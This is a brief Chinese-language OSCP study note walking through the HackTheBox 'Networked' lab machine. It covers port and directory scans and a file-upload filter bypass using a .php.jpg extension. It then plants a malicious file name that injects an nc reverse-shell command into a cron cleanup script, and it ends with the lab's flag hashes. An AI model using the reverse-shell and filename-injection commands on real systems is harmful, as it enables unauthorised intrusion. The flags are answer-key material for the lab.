OSCP备考_0x15_HackThBox靶机_Linux_networked
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)

nmap -sU --top-ports 100 10.129.204.201 (扫描UDP)

gobuster dir -u http://10.129.204.201/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

在backup里面有一个tar文件里面放着所有源代码,这边直接阅读代码后发现,只需要在.php后缀上添加.jpg即可以绕过



可以到home底下去查看有哪些用户和脚本使用
发现

发现有判断文件后删除的执行exec地方
/var/www/html/uploads底下创建
touch "; nc 10.10.16.31 1338 -c bash"
直接写入后三分钟后反弹SHELL




94d87600607d374fefe915de49df8507

8d3a2f3f49b5d5b243269c5e1e87aa9b





